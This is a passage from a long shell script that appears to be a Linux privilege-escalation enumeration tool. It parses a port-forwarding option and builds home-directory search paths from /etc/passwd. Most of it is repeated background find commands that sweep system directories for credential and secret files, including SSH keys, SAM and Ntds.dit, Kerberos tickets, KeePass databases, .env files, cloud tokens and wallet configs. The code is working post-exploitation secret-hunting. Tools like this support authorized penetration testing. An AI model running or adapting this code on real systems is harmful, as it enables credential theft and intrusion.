10.10.14.8:7777:127.0.0.1:8000"$NC; fi # Check if REMOTE_PORT is a number if ! [
"$(echo $REMOTE_PORT | grep -E '^[0-9]+$')" ]; then printf $RED"[-] Err: Invalid
port forwarding configuration: $PORT_FORWARD. The format is:
LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example:
10.10.14.8:7777:127.0.0.1:8000"$NC; fi port_forward "$LOCAL_IP" "$LOCAL_PORT"
"$REMOTE_IP" "$REMOTE_PORT" exit 0 fi # Get HOMESEARCH if [ "$SEARCH_IN_FOLDER"
]; then HOMESEARCH="${ROOT_FOLDER}home/ ${ROOT_FOLDER}Users/ ${ROOT_FOLDER}root/
${ROOT_FOLDER}var/www/" else HOMESEARCH="/home/ /Users/ /root/ /var/www $(cat
/etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev
"^/root|^/home|^/Users|^/var/www" | tr "\n" " ")" if ! echo "$HOMESEARCH" | grep
-q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users|^/var/www";
then #If not listed and not in /home, /Users/, /root, or /var/www add current
home folder HOMESEARCH="$HOME $HOMESEARCH" fi fi GREPHOMESEARCH=$(echo
"$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before
putting "|" ########################################### #----------) Caching
Finds (--------------# ########################################### if [
"$SEARCH_IN_FOLDER" ]; then printf $GREEN"Caching directories "$NC
CONT_THREADS=0 # FIND ALL KNOWN INTERESTING SOFTWARE FILES
FIND_DIR_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER -type d -name
\"ErrorRecords\" -o -name \".irssi\" -o -name \".docker\" -o -name \".kube*\" -o
-name \"dirsrv\" -o -name \"postfix\" -o -name \"ipa\" -o -name \"kubernetes\"
-o -name \"nginx\" -o -name \"mysql\" -o -name \"kubelet\" -o -name
\"environments\" -o -name \"gcloud\" -o -name \"seeddms*\" -o -name \"zabbix\"
-o -name \".password-store\" -o -name \"cacti\" -o -name \"system.d\" -o -name
\"system-connections\" -o -name \"sites-enabled\" -o -name \"logstash\" -o -name
\"doctl\" -o -name \".vnc\" -o -name \"bind\" -o -name \"roundcube\" -o -name
\"pam.d\" -o -name \".cloudflared\" -o -name \"varnish\" -o -name \"filezilla\"
-o -name \"*jenkins\" -o -name \"concourse-auth\" -o -name \".svn\" -o -name
\"ldap\" -o -name \"concourse-keys\" -o -name \"kube-proxy\" -o -name \"sentry\"
-o -name \".bluemix\" -o -name \"neo4j\" -o -name \"keyrings\" -o -name
\"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf
\\\$YELLOW'. '\\\$NC 1>&2;"` FIND_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER
-name \"*.sqlite\" -o -name \"*.gnupg\" -o -name \"*.sqlite3\" -o -name
\"SYSTEM\" -o -name \"gvm-tools.conf\" -o -name \"docker.socket\" -o -name
\"config.xml\" -o -name \"sip.conf\" -o -name \"scclient.exe\" -o -name
\"*.ovpn\" -o -name \"anaconda-ks.cfg\" -o -name \".env*\" -o -name
\"KeePass.ini\" -o -name \"passbolt.php\" -o -name \"AppEvent.Evt\" -o -name
\"FreeSSHDservice.ini\" -o -name \"*.db\" -o -name \"server.xml\" -o -name
\"bitcoin.conf\" -o -name \"SecEvent.Evt\" -o -name \"*.vhdx\" -o -name
\"hostapd.conf\" -o -name \"cesi.conf\" -o -name \"https.conf\" -o -name
\"sitemanager.xml\" -o -name \"*.vhd\" -o -name \"backup\" -o -name \"php.ini\"
-o -name \".htpasswd\" -o -name \"RDCMan.settings\" -o -name \"*.jks\" -o -name
\".flyrc\" -o -name \"*password*\" -o -name \"*vnc*.ini\" -o -name
\"legacy_credentials.db\" -o -name \"SAM\" -o -name \"containerd.sock\" -o -name
\"krb5cc_*\" -o -name \"https-xampp.conf\" -o -name \"*knockd*\" -o -name
\"*vnc*.txt\" -o -name \"psk.txt\" -o -name \"winscp.ini\" -o -name
\"jetty-realm.properties\" -o -name \"*.rdg\" -o -name \"kadm5.acl\" -o -name
\"datasources.xml\" -o -name \"*credential*\" -o -name \"hudson.util.Secret\" -o
-name \"*.tf\" -o -name \"glusterfs.key\" -o -name \"sysprep.xml\" -o -name
\"ws_ftp.ini\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"cloud.cfg\" -o -name \"*.socket\" -o -name \"grafana.ini\" -o -name
\"authorized_hosts\" -o -name \"airflow.cfg\" -o -name \"settings.php\" -o -name
\"access_tokens.db\" -o -name \"*_history*\" -o -name \"*.key\" -o -name
\"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\" -o -name
\"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o -name
\"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"ssh*config\" -o -name \"sess_*\" -o -name \"*.pfx\" -o -name
\"atlantis.db\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.ftpconfig\" -o
-name \".credentials.json\" -o -name \"kibana.y*ml\" -o -name \"gitlab.yml\" -o
-name \"pgadmin*.db\" -o -name \"scheduledtasks.xml\" -o -name \"httpd.conf\" -o
-name \"pg_hba.conf\" -o -name \"pgadmin4.db\" -o -name \"system.sav\" -o -name
\"000-default.conf\" -o -name \"*.swp\" -o -name \"appcmd.exe\" -o -name
\"*.der\" -o -name \"log4j-core*.jar\" -o -name \".lesshst\" -o -name
\"unattended.xml\" -o -name \"Dockerfile\" -o -name \"exports\" -o -name
\"rocketchat.service\" -o -name \"*.pem\" -o -name \".git\" -o -name
\"autounattend.xml\" -o -name \".git-credentials\" -o -name \"printers.xml\" -o
-name \"webserver_config.py\" -o -name \".recently-used.xbel\" -o -name
\"snyk.json\" -o -name \"setupinfo\" -o -name \"mosquitto.conf\" -o -name
\"influxdb.conf\" -o -name \"rktlet.sock\" -o -name \"secrets.ldb\" -o -name
\"firebase-tools.json\" -o -name \".pypirc\" -o -name \"amportal.conf\" -o -name
\"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o -name \"wsl.exe\" -o -name
\".profile\" -o -name \"credentials.db\" -o -name \"*.crt\" -o -name
\".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\" -o -name
\"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"agent*\" -o -name \"*.keyring\" -o -name \".secrets.mkey\" -o -name
\"*.service\" -o -name \"zabbix_server.conf\" -o -name \".github\" -o -name
\"KeePass.enforced*\" -o -name \".bashrc\" -o -name \"pwd.ibd\" -o -name
\"id_rsa*\" -o -name \"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name
\"*.p12\" -o -name \"NetSetup.log\" -o -name \"azureProfile.json\" -o -name
\"rpcd\" -o -name \"vsftpd.conf\" -o -name \"authorized_keys\" -o -name
\"Elastix.conf\" -o -name \"software\" -o -name \"*.csr\" -o -name
\"plum.sqlite\" -o -name \"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\"
-o -name \"groups.xml\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter elif
echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep
-q software_information || echo $CHECKS | grep -q interesting_files; then printf
$GREEN"Caching directories "$NC CONT_THREADS=0 # FIND ALL KNOWN INTERESTING
SOFTWARE FILES FIND_DIR_APPLICATIONS=`eval_bckgrd "find
${ROOT_FOLDER}applications -type d -name \"ErrorRecords\" -o -name \".irssi\" -o
-name \".kube*\" -o -name \".docker\" -o -name \"dirsrv\" -o -name \"postfix\"
-o -name \"ipa\" -o -name \"nginx\" -o -name \"mysql\" -o -name \"environments\"
-o -name \"gcloud\" -o -name \"seeddms*\" -o -name \"zabbix\" -o -name
\".password-store\" -o -name \"cacti\" -o -name \"sites-enabled\" -o -name
\"logstash\" -o -name \"doctl\" -o -name \".vnc\" -o -name \"roundcube\" -o
-name \".cloudflared\" -o -name \"varnish\" -o -name \"filezilla\" -o -name
\"*jenkins\" -o -name \"concourse-auth\" -o -name \".svn\" -o -name \"ldap\" -o
-name \"concourse-keys\" -o -name \"sentry\" -o -name \".bluemix\" -o -name
\"neo4j\" -o -name \"keyrings\" -o -name \"legacy_credentials\" -o -name
\"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_BIN=`eval_bckgrd "find ${ROOT_FOLDER}bin -type d -name \"ErrorRecords\"
-o -name \".irssi\" -o -name \".kube*\" -o -name \".docker\" -o -name \"dirsrv\"
-o -name \"postfix\" -o -name \"ipa\" -o -name \"nginx\" -o -name \"mysql\" -o
-name \"environments\" -o -name \"gcloud\" -o -name \"seeddms*\" -o -name
\"zabbix\" -o -name \".password-store\" -o -name \"cacti\" -o -name
\"sites-enabled\" -o -name \"logstash\" -o -name \"doctl\" -o -name \".vnc\" -o
-name \"roundcube\" -o -name \".cloudflared\" -o -name \"varnish\" -o -name
\"filezilla\" -o -name \"*jenkins\" -o -name \"concourse-auth\" -o -name
\".svn\" -o -name \"ldap\" -o -name \"concourse-keys\" -o -name \"sentry\" -o
-name \".bluemix\" -o -name \"neo4j\" -o -name \"keyrings\" -o -name
\"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf
\\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_CACHE=`eval_bckgrd "find
${ROOT_FOLDER}.cache -type d -name \"ErrorRecords\" -o -name \".irssi\" -o -name
\".kube*\" -o -name \".docker\" -o -name \"dirsrv\" -o -name \"postfix\" -o
-name \"ipa\" -o -name \"nginx\" -o -name \"mysql\" -o -name \"environments\" -o
-name \"gcloud\" -o -name \"seeddms*\" -o -name \"zabbix\" -o -name
\".password-store\" -o -name \"cacti\" -o -name \"sites-enabled\" -o -name
\"logstash\" -o -name \"doctl\" -o -name \".vnc\" -o -name \"roundcube\" -o
-name \".cloudflared\" -o -name \"varnish\" -o -name \"filezilla\" -o -name
\"*jenkins\" -o -name \"concourse-auth\" -o -name \".svn\" -o -name \"ldap\" -o
-name \"concourse-keys\" -o -name \"sentry\" -o -name \".bluemix\" -o -name
\"neo4j\" -o -name \"keyrings\" -o -name \"legacy_credentials\" -o -name
\"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_CDROM=`eval_bckgrd "find ${ROOT_FOLDER}cdrom -type d -name
\"ErrorRecords\" -o -name \".irssi\" -o -name \".kube*\" -o -name \".docker\" -o
-name \"dirsrv\" -o -name \"postfix\" -o -name \"ipa\" -o -name \"nginx\" -o
-name \"mysql\" -o -name \"environments\" -o -name \"gcloud\" -o -name
\"seeddms*\" -o -name \"zabbix\" -o -name \".password-store\" -o -name \"cacti\"
-o -name \"sites-enabled\" -o -name \"logstash\" -o -name \"doctl\" -o -name
\".vnc\" -o -name \"roundcube\" -o -name \".cloudflared\" -o -name \"varnish\"
-o -name \"filezilla\" -o -name \"*jenkins\" -o -name \"concourse-auth\" -o
-name \".svn\" -o -name \"ldap\" -o -name \"concourse-keys\" -o -name \"sentry\"
-o -name \".bluemix\" -o -name \"neo4j\" -o -name \"keyrings\" -o -name
\"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf
\\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_ETC=`eval_bckgrd "find ${ROOT_FOLDER}etc
-type d -name \"ErrorRecords\" -o -name \".irssi\" -o -name \".kube*\" -o -name
\".docker\" -o -name \"dirsrv\" -o -name \"postfix\" -o -name \"ipa\" -o -name
\"kubernetes\" -o -name \"nginx\" -o -name \"mysql\" -o -name \"kubelet\" -o
-name \"environments\" -o -name \"gcloud\" -o -name \"seeddms*\" -o -name
\"zabbix\" -o -name \".password-store\" -o -name \"system.d\" -o -name \"cacti\"
-o -name \"system-connections\" -o -name \"sites-enabled\" -o -name \"logstash\"
-o -name \"doctl\" -o -name \".vnc\" -o -name \"bind\" -o -name \"pam.d\" -o
-name \"roundcube\" -o -name \".cloudflared\" -o -name \"varnish\" -o -name
\"filezilla\" -o -name \"*jenkins\" -o -name \"concourse-auth\" -o -name
\".svn\" -o -name \"ldap\" -o -name \"concourse-keys\" -o -name \"kube-proxy\"
-o -name \"sentry\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name
\"keyrings\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null |
sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_HOMESEARCH=`eval_bckgrd "find
$HOMESEARCH -type d -name \"ErrorRecords\" -o -name \".irssi\" -o -name
\".kube*\" -o -name \".docker\" -o -name \"dirsrv\" -o -name \"postfix\" -o
-name \"ipa\" -o -name \"nginx\" -o -name \"mysql\" -o -name \"environments\" -o
-name \"gcloud\" -o -name \"seeddms*\" -o -name \"zabbix\" -o -name
\".password-store\" -o -name \"cacti\" -o -name \"sites-enabled\" -o -name
\"logstash\" -o -name \"doctl\" -o -name \".vnc\" -o -name \"roundcube\" -o
-name \".cloudflared\" -o -name \"varnish\" -o -name \"filezilla\" -o -name
\"*jenkins\" -o -name \"concourse-auth\" -o -name \".svn\" -o -name \"ldap\" -o
-name \"concourse-keys\" -o -name \"sentry\" -o -name \".bluemix\" -o -name
\"neo4j\" -o -name \"keyrings\" -o -name \"legacy_credentials\" -o -name
\"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_MEDIA=`eval_bckgrd "find ${ROOT_FOLDER}media -type d -name
\"ErrorRecords\" -o -name \".irssi\" -o -name \".kube*\" -o -name \".docker\" -o
-name \"dirsrv\" -o -name \"postfix\" -o -name \"ipa\" -o -name \"nginx\" -o
-name \"mysql\" -o -name \"environments\" -o -name \"gcloud\" -o -name
\"seeddms*\" -o -name \"zabbix\" -o -name \".password-store\" -o -name \"cacti\"
-o -name \"sites-enabled\" -o -name \"logstash\" -o -name \"doctl\" -o -name
\".vnc\" -o -name \"roundcube\" -o -name \".cloudflared\" -o -name \"varnish\"
-o -name \"filezilla\" -o -name \"*jenkins\" -o -name \"concourse-auth\" -o
-name \".svn\" -o -name \"ldap\" -o -name \"concourse-keys\" -o -name \"sentry\"
-o -name \".bluemix\" -o -name \"neo4j\" -o -name \"keyrings\" -o -name
\"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf
\\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_MNT=`eval_bckgrd "find ${ROOT_FOLDER}mnt
-type d -name \"ErrorRecords\" -o -name \".irssi\" -o -name \".kube*\" -o -name
\".docker\" -o -name \"dirsrv\" -o -name \"postfix\" -o -name \"ipa\" -o -name
\"nginx\" -o -name \"mysql\" -o -name \"environments\" -o -name \"gcloud\" -o
-name \"seeddms*\" -o -name \"zabbix\" -o -name \".password-store\" -o -name
\"cacti\" -o -name \"sites-enabled\" -o -name \"logstash\" -o -name \"doctl\" -o
-name \".vnc\" -o -name \"roundcube\" -o -name \".cloudflared\" -o -name
\"varnish\" -o -name \"filezilla\" -o -name \"*jenkins\" -o -name
\"concourse-auth\" -o -name \".svn\" -o -name \"ldap\" -o -name
\"concourse-keys\" -o -name \"sentry\" -o -name \".bluemix\" -o -name \"neo4j\"
-o -name \"keyrings\" -o -name \"legacy_credentials\" -o -name \"couchdb\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_OPT=`eval_bckgrd "find ${ROOT_FOLDER}opt -type d -name \"ErrorRecords\"
-o -name \".irssi\" -o -name \".kube*\" -o -name \".docker\" -o -name \"dirsrv\"
-o -name \"postfix\" -o -name \"ipa\" -o -name \"nginx\" -o -name \"mysql\" -o
-name \"environments\" -o -name \"gcloud\" -o -name \"seeddms*\" -o -name
\"zabbix\" -o -name \".password-store\" -o -name \"cacti\" -o -name
\"sites-enabled\" -o -name \"logstash\" -o -name \"doctl\" -o -name \".vnc\" -o
-name \"roundcube\" -o -name \".cloudflared\" -o -name \"varnish\" -o -name
\"filezilla\" -o -name \"*jenkins\" -o -name \"concourse-auth\" -o -name
\".svn\" -o -name \"ldap\" -o -name \"concourse-keys\" -o -name \"sentry\" -o
-name \".bluemix\" -o -name \"neo4j\" -o -name \"keyrings\" -o -name
\"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf
\\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_PRIVATE=`eval_bckgrd "find
${ROOT_FOLDER}private -type d -name \"ErrorRecords\" -o -name \".irssi\" -o
-name \".kube*\" -o -name \".docker\" -o -name \"dirsrv\" -o -name \"postfix\"
-o -name \"ipa\" -o -name \"nginx\" -o -name \"mysql\" -o -name \"environments\"
-o -name \"gcloud\" -o -name \"seeddms*\" -o -name \"zabbix\" -o -name
\".password-store\" -o -name \"cacti\" -o -name \"sites-enabled\" -o -name
\"logstash\" -o -name \"doctl\" -o -name \".vnc\" -o -name \"roundcube\" -o
-name \".cloudflared\" -o -name \"varnish\" -o -name \"filezilla\" -o -name
\"*jenkins\" -o -name \"concourse-auth\" -o -name \".svn\" -o -name \"ldap\" -o
-name \"concourse-keys\" -o -name \"sentry\" -o -name \".bluemix\" -o -name
\"neo4j\" -o -name \"keyrings\" -o -name \"legacy_credentials\" -o -name
\"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_SBIN=`eval_bckgrd "find ${ROOT_FOLDER}sbin -type d -name
\"ErrorRecords\" -o -name \".irssi\" -o -name \".kube*\" -o -name \".docker\" -o
-name \"dirsrv\" -o -name \"postfix\" -o -name \"ipa\" -o -name \"nginx\" -o
-name \"mysql\" -o -name \"environments\" -o -name \"gcloud\" -o -name
\"seeddms*\" -o -name \"zabbix\" -o -name \".password-store\" -o -name \"cacti\"
-o -name \"sites-enabled\" -o -name \"logstash\" -o -name \"doctl\" -o -name
\".vnc\" -o -name \"roundcube\" -o -name \".cloudflared\" -o -name \"varnish\"
-o -name \"filezilla\" -o -name \"*jenkins\" -o -name \"concourse-auth\" -o
-name \".svn\" -o -name \"ldap\" -o -name \"concourse-keys\" -o -name \"sentry\"
-o -name \".bluemix\" -o -name \"neo4j\" -o -name \"keyrings\" -o -name
\"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf
\\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_SNAP=`eval_bckgrd "find ${ROOT_FOLDER}snap
-type d -name \"ErrorRecords\" -o -name \".irssi\" -o -name \".kube*\" -o -name
\".docker\" -o -name \"dirsrv\" -o -name \"postfix\" -o -name \"ipa\" -o -name
\"nginx\" -o -name \"mysql\" -o -name \"environments\" -o -name \"gcloud\" -o
-name \"seeddms*\" -o -name \"zabbix\" -o -name \".password-store\" -o -name
\"cacti\" -o -name \"sites-enabled\" -o -name \"logstash\" -o -name \"doctl\" -o
-name \".vnc\" -o -name \"roundcube\" -o -name \".cloudflared\" -o -name
\"varnish\" -o -name \"filezilla\" -o -name \"*jenkins\" -o -name
\"concourse-auth\" -o -name \".svn\" -o -name \"ldap\" -o -name
\"concourse-keys\" -o -name \"sentry\" -o -name \".bluemix\" -o -name \"neo4j\"
-o -name \"keyrings\" -o -name \"legacy_credentials\" -o -name \"couchdb\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_SRV=`eval_bckgrd "find ${ROOT_FOLDER}srv -type d -name \"ErrorRecords\"
-o -name \".irssi\" -o -name \".kube*\" -o -name \".docker\" -o -name \"dirsrv\"
-o -name \"postfix\" -o -name \"ipa\" -o -name \"nginx\" -o -name \"mysql\" -o
-name \"environments\" -o -name \"gcloud\" -o -name \"seeddms*\" -o -name
\"zabbix\" -o -name \".password-store\" -o -name \"cacti\" -o -name
\"sites-enabled\" -o -name \"logstash\" -o -name \"doctl\" -o -name \".vnc\" -o
-name \"roundcube\" -o -name \".cloudflared\" -o -name \"varnish\" -o -name
\"filezilla\" -o -name \"*jenkins\" -o -name \"concourse-auth\" -o -name
\".svn\" -o -name \"ldap\" -o -name \"concourse-keys\" -o -name \"sentry\" -o
-name \".bluemix\" -o -name \"neo4j\" -o -name \"keyrings\" -o -name
\"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf
\\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_TMP=`eval_bckgrd "find ${ROOT_FOLDER}tmp
-type d -name \"ErrorRecords\" -o -name \".irssi\" -o -name \".kube*\" -o -name
\".docker\" -o -name \"dirsrv\" -o -name \"postfix\" -o -name \"ipa\" -o -name
\"nginx\" -o -name \"mysql\" -o -name \"environments\" -o -name \"gcloud\" -o
-name \"seeddms*\" -o -name \"zabbix\" -o -name \".password-store\" -o -name
\"cacti\" -o -name \"sites-enabled\" -o -name \"logstash\" -o -name \"doctl\" -o
-name \".vnc\" -o -name \"roundcube\" -o -name \".cloudflared\" -o -name
\"varnish\" -o -name \"filezilla\" -o -name \"*jenkins\" -o -name
\"concourse-auth\" -o -name \".svn\" -o -name \"ldap\" -o -name
\"concourse-keys\" -o -name \"sentry\" -o -name \".bluemix\" -o -name \"neo4j\"
-o -name \"keyrings\" -o -name \"legacy_credentials\" -o -name \"couchdb\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_USR=`eval_bckgrd "find ${ROOT_FOLDER}usr -type d -name \"ErrorRecords\"
-o -name \".irssi\" -o -name \".kube*\" -o -name \".docker\" -o -name \"dirsrv\"
-o -name \"postfix\" -o -name \"ipa\" -o -name \"nginx\" -o -name \"mysql\" -o
-name \"environments\" -o -name \"gcloud\" -o -name \"seeddms*\" -o -name
\"zabbix\" -o -name \".password-store\" -o -name \"cacti\" -o -name
\"sites-enabled\" -o -name \"logstash\" -o -name \"doctl\" -o -name \".vnc\" -o
-name \"bind\" -o -name \"roundcube\" -o -name \".cloudflared\" -o -name
\"varnish\" -o -name \"filezilla\" -o -name \"*jenkins\" -o -name
\"concourse-auth\" -o -name \".svn\" -o -name \"ldap\" -o -name
\"concourse-keys\" -o -name \"sentry\" -o -name \".bluemix\" -o -name \"neo4j\"
-o -name \"keyrings\" -o -name \"legacy_credentials\" -o -name \"couchdb\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_VAR=`eval_bckgrd "find ${ROOT_FOLDER}var -type d -name \"ErrorRecords\"
-o -name \".irssi\" -o -name \".kube*\" -o -name \".docker\" -o -name \"dirsrv\"
-o -name \"postfix\" -o -name \"ipa\" -o -name \"kubernetes\" -o -name \"nginx\"
-o -name \"mysql\" -o -name \"kubelet\" -o -name \"environments\" -o -name
\"gcloud\" -o -name \"seeddms*\" -o -name \"zabbix\" -o -name
\".password-store\" -o -name \"cacti\" -o -name \"sites-enabled\" -o -name
\"logstash\" -o -name \"doctl\" -o -name \".vnc\" -o -name \"bind\" -o -name
\"roundcube\" -o -name \".cloudflared\" -o -name \"varnish\" -o -name
\"filezilla\" -o -name \"*jenkins\" -o -name \"concourse-auth\" -o -name
\".svn\" -o -name \"ldap\" -o -name \"concourse-keys\" -o -name \"kube-proxy\"
-o -name \"sentry\" -o -name \".bluemix\" -o -name \"neo4j\" -o -name
\"keyrings\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null |
sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_CONCOURSE_AUTH=`eval_bckgrd
"find ${ROOT_FOLDER}concourse-auth -type d -name \"concourse-auth\" 2>/dev/null
| sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_CONCOURSE_KEYS=`eval_bckgrd
"find ${ROOT_FOLDER}concourse-keys -type d -name \"concourse-keys\" 2>/dev/null
| sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_APPLICATIONS=`eval_bckgrd "find
${ROOT_FOLDER}applications -name \"*.sqlite\" -o -name \"*.gnupg\" -o -name
\"*.sqlite3\" -o -name \"SYSTEM\" -o -name \"gvm-tools.conf\" -o -name
\"docker.socket\" -o -name \"config.xml\" -o -name \"sip.conf\" -o -name
\"scclient.exe\" -o -name \"*.ovpn\" -o -name \"anaconda-ks.cfg\" -o -name
\".env*\" -o -name \"KeePass.ini\" -o -name \"passbolt.php\" -o -name
\"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.db\" -o -name
\"server.xml\" -o -name \"bitcoin.conf\" -o -name \"SecEvent.Evt\" -o -name
\"*.vhdx\" -o -name \"hostapd.conf\" -o -name \"cesi.conf\" -o -name
\"https.conf\" -o -name \"sitemanager.xml\" -o -name \"*.vhd\" -o -name
\"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o -name
\"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name \"vault-ssh-helper.hcl\" -o
-name \"*.ftpconfig\" -o -name \".credentials.json\" -o -name \"kibana.y*ml\" -o
-name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"scheduledtasks.xml\" -o
-name \"httpd.conf\" -o -name \"pg_hba.conf\" -o -name \"pgadmin4.db\" -o -name
\"system.sav\" -o -name \"000-default.conf\" -o -name \"*.swp\" -o -name
\"appcmd.exe\" -o -name \"*.der\" -o -name \"log4j-core*.jar\" -o -name
\".lesshst\" -o -name \"unattended.xml\" -o -name \"Dockerfile\" -o -name
\"rocketchat.service\" -o -name \"*.pem\" -o -name \".git\" -o -name
\"autounattend.xml\" -o -name \".git-credentials\" -o -name \"printers.xml\" -o
